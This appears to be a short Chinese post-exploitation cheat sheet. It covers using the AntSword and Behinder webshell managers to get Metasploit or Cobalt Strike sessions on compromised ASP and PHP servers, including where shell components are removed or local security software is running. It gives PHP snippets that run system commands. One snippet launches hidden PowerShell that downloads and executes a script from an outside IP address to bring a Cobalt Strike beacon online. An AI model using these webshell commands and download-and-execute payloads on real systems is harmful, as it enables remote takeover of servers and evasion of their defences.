限制条件
仅支持ASP,WScript.Shell、Shell.Application组件被卸载;又或者支持ASP.NET,但是存在有某些安全防护软件(360、云锁、安全狗等),在这两种场景下可能无法执行命令、上线和提权等。
蚁剑
利用As-Exploits后渗透插件中的执行自定义Payload功能来获取MSF会话。
选择对应Webshell -> As-Exploits -> 执行自定义Payload -> 执行ASP脚本上线。
冰蝎
连接Webshell -> 自定义代码
exec(),system()
<?php
echo system("pwd");
?>
cs上线
注意双引号的转义
<?php
echo system("powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://101.35.17.6:19999/a'))\"");
?>